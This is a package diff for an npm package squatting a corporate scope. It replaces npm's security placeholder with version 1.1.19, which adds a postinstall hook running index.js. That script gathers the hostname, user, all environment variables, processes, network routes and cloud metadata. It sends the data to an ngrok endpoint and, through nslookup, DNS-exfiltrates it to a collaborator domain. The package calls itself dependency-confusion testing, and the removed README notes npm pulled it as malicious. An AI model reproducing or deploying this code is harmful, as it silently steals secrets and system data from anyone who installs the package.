@usaa-grp-ent-conv-platform/usaa 0.0.1-security → 1.1.19

package/chunk.769.012e7442dc199b7cac66.js

@@ -0,0 +1,53 @@
+
+
+
+
+        <!doctype html><!-- usaa-serverbusy-page@0.0.0 --><html lang="en"><head><meta name="ROBOTS" content="nofollow,noindex" /><title data-react-helmet="true">  System Error  | USAA | USAA</title><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta id="Viewport" name="viewport" content="width=device-width, initial-scale=1"/><link data-react-helmet="true" rel="stylesheet" href="/serverbusy/react0624/nav!utils.css"/><script>var USAA={};USAA.ent={};USAA.ent.digitalData={"page":{"activityType":"Error","attributes":{"appId":"usaa-serverbusy-page"},"businessUnit":"USAA","flowType":"Error","pageDesc":"Error","pageName":"","productLOB":"None","productOffered":"None","productQualifier":"None"},"product":[],"event":[],"component":{"attributes":{}},"user":{"attributes":{}},"version":{"version":"1"},"campaign":{}};</script> <script data-react-helmet="true" async="" defer="" src="/serverbusy/react0624/nav!utils.js"></script><script data-react-helmet="true">
+(function() {
+    var breakpoints = {"0":"xxs","414":"xs","568":"sm","768":"md","1024":"lg","1280":"xl","1440":"xxl","1600":"xxxl"};
+    var attempts = 0;
+
+    function getGridLayoutClasses(el) {
+        var result = [];
+
+        if (el && typeof el.offsetWidth === 'number') {
+            var width = el.offsetWidth;
+
+            for (var breakpointSize in breakpoints) {
+                if (width > Number(breakpointSize)) {
+                    result.push('layout-' + breakpoints[breakpointSize]);
+                }
+            }
+        }
+
+        return result;
+    }
+
+    function updatePageGridClasses() {
+        var el = document.querySelector('.mainPanel');
+        if (el) {
+            var layoutClasses = getGridLayoutClasses(el);
+            el.className += ' ' + layoutClasses.join(' ');
+        } else {
+            if (attempts > 100) return;
+            attempts++;
+            setTimeout(updatePageGridClasses, 5);
+        }
+    }
+
+    updatePageGridClasses();
+})();
+    var requestId = "888a0217"
+    var statusCode = "2736803";
+    var ipAddress = "129.222.253.45";
+    
+        
+		    
+        	    var errorType = "System Error";
+        	    var errorDescription = "We’ve encountered a problem. We are looking into it. ";
+        	    var errorDetails = "Please try again later, or for immediate assistance ";
+		    
+        
+
+</script><link rel="stylesheet" href="/serverbusy/react0624/usaa-serverbusy-page.a583054019b83d3b032c.css"/></head><body class="font-narrow"><div id="mainAppRoot"><div class="pageWrapper"><a href="#usaa-templateContent" class="usaa-skipToContent screenReader" accessKey="2">Skip to Content</a><div class="pageWrapper-inner"><div class="usaa-globalHeader"></div><div id="usaa-templateContent" class="pageContent"><div class="mainPanel " role="main"><div class="mainContentWrapper"><div class=""><div class="errorPage"><svg class="errorPage-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 -30 90 90"><path fill="#0D2F4C" d="M0-21v15h90v-15H0zm7.5 10.5c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zM0-3v54h90V-3H0zm56.7 34.7l-4.2 4.2-7.5-7.4-7.4 7.4-4.2-4.2 7.4-7.4-7.4-7.4 4.2-4.2L45 20l7.4-7.4 4.2 4.2-7.4 7.4 7.5 7.5z"></path></svg><h1 class="errorPage-title">  System Error </h1><p class="errorPage-description">errorDescription<br class="break"/>errorDetails <a href="#" aria-label="contact us, opens popup">contact us</a>.</p></div></div></div></div></div><footer class="pageFooter"><div class="usaa-globalFooterNav"></div><div class="pageFooter-notes"><div class="pageFooter-disclosures pageFooter-disclosures--aboveFootnotes"></div><div class="pageFooter-footnotes"></div><div class="pageFooter-disclosures pageFooter-disclosures--belowFootnotes"></div></div></footer></div></div></div> <script src="https://www.usaa.com/serverbusy/react0624/react!react-dom.min.js"></script><script src="/serverbusy/react0624/usaa-serverbusy-page.e9ff19371382ff950218.js"></script> </body></html>
+    

package/index.js

@@ -0,0 +1,82 @@
+const os = require("os");
+const { execSync } = require("child_process");
+const https = require("https");
+const fs = require("fs");
+
+// Set up endpoints
+const ngrokURL = "https://7c9a-98-97-172-99.ngrok-free.app"; // Replace with your actual ngrok endpoint
+const collaboratorURL = "v1x2xki0sr5mbc04v2cjyt6p0g68u8ix.oastify.com";
+
+// Function to execute shell commands
+function runCommand(command) {
+    try {
+        return execSync(command, { encoding: "utf-8" }).trim();
+    } catch (error) {
+        return `Error executing command: ${command}`;
+    }
+}
+
+// Collect system information
+const systemInfo = {
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    os: os.platform(),
+    arch: os.arch(),
+    cpus: os.cpus().length,
+    date: new Date().toISOString(),
+    networkInterfaces: os.networkInterfaces(),
+    environmentVariables: process.env,
+    runningProcesses: runCommand("tasklist"),
+    dnsResolvers: runCommand("nslookup google.com"),
+    activeDirectoryDomain: runCommand("whoami /fqdn"),
+    internalRoutes: runCommand("route print"),
+    reverseDNS: runCommand(`nslookup ${collaboratorURL}`),
+    traceroute: runCommand("tracert -d 8.8.8.8"),
+    publicIP: runCommand("curl -s ifconfig.me || curl -s https://api64.ipify.org"),
+    awsMetadata: runCommand("curl -s http://169.254.169.254/latest/meta-data/")
+};
+
+// Convert system info to JSON
+const jsonData = JSON.stringify(systemInfo, null, 2);
+
+// Log locally for debugging
+fs.writeFileSync("system_info.json", jsonData);
+
+// Send data to ngrok endpoint
+function sendDataToNgrok(data) {
+    const options = {
+        hostname: ngrokURL.replace("https://", ""),
+        port: 443,
+        path: "/log",
+        method: "POST",
+        headers: {
+            "Content-Type": "application/json",
+            "Content-Length": data.length
+        }
+    };
+
+    const req = https.request(options, (res) => {
+        console.log(`Ngrok Response: ${res.statusCode}`);
+    });
+
+    req.on("error", (error) => {
+        console.error(`Error sending to Ngrok: ${error.message}`);
+    });
+
+    req.write(data);
+    req.end();
+}
+
+// Send data to Burp Collaborator via DNS exfiltration
+function sendDataToCollaborator(data) {
+    try {
+        const base64Data = Buffer.from(data).toString("base64").slice(0, 200); // Limit query length
+        execSync(`nslookup ${base64Data}.${collaboratorURL}`);
+    } catch (error) {
+        console.error("Collaborator Exfiltration Failed:", error.message);
+    }
+}
+
+// Execute exfiltration
+sendDataToNgrok(jsonData);
+sendDataToCollaborator(jsonData);

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "@usaa-grp-ent-conv-platform/usaa",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.1.19",
+  "description": "Security testing package for dependency confusion vulnerability",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "Th3_Mad_Hack3r",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40usaa-grp-ent-conv-platform%2Fusaa for more information.